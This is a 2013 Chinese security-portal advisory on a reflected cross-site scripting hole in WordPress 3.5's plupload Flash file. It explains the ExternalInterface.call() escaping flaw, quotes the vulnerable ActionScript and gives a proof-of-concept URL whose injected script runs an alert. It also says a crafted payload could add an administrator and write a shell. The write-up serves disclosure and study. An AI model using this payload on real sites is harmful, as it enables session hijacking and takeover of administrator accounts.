WordPress反射型跨站(0day)_SecYe安全 - 网络信息安全IT技术门户（网络安全、黑客防御、信息安全、编程开发、系统知识）

WordPress反射型跨站(0day)

时间：2013-02-25 19:02 来源：未知作者：www.secye.com 阅读：次

WordPress3.5某处Flash应用存在漏洞，可能导致跨站脚本攻击。

当一个已经登录后台的会话访问某一特定网页时，攻击者精心构造的payload可以在后台添加一个同等权限的用户，并写入Shell(如果权限允许的话)。

http://player.youku.com/player.php/sid/XNTAwMjY0MzQ4/v.swf

这种类型的漏洞是Google的大牛Michal Zalewski最先公开的，我这里就简单说明下。(原文 The other reason to beware ExternalInterface.call() -- http://lcamtuf.blogspot.com/2011/03/other-reason-to-beware-of.html)

as脚本运行flash.external.ExternalInterface.call($methodName, $parameter)时，flash player会调用HTML的js，运行

try { __flash__toXML($methodName("$parameter")) ; } catch (e) { ""; }

如果我们试着尝试在$parameter中加入" 如flash.external.ExternalInterface.call("alert",'"2')，js运行的是

try { __flash__toXML(alert("\"2")) ; } catch (e) { ""; }

flash player会对"进行转义，但搞笑的是对于传入的\，flash player却原样输出了，如此一来，我们就可以利用传入的\去转义原本用来转义"的转义符\。

flash.external.ExternalInterface.call("alert",'\\"2')

try { __flash__toXML(alert("\\"2")) ; } catch (e) { ""; }

剩下的就是闭合)}这类的事情了

flash.external.ExternalInterface.call("alert",'\\"2))}catch(e){alert(3)//')

try { __flash__toXML(alert("\\"2))}catch(e){alert(3)//}")) ; } catch (e) { ""; }

Vulnerable SWF File: /wp-includes/js/plupload/plupload.flash.swf

Vulnerable Code:

com.plupload.Plupload www.2cto.com

private function init(event:Event = null) : void

{

removeEventListener(Event.ADDED_TO_STAGE, this.init);

this.id = this.stage.loaderInfo.parameters["id"];

...

this.fireEvent("Init");

return;

}// end function

...

private function fireEvent(param1:String, param2:Object = null) : void

{

ExternalInterface.call("plupload.flash.trigger", this.id, param1, param2);

return;

}// end function

原始SWF下载：http://swfpoc.appspot.com/vul/wordpress_plupload.flash.swf

Proof of Concept:

http://wordpress/wp-includes/js/plupload/plupload.flash.swf?id=0\"))}catch(e){if(!window.x){window.x=1;alert(2)}}//

本文来源：SecYe安全网[http://www.secye.com] (责任编辑：SecYe安全)

点击复制链接与好友分享!

顶一下

(0)

踩一下

(0)

上一篇：ESONCN CMS修改文件漏洞
下一篇：突破护卫神利用for读取账号密码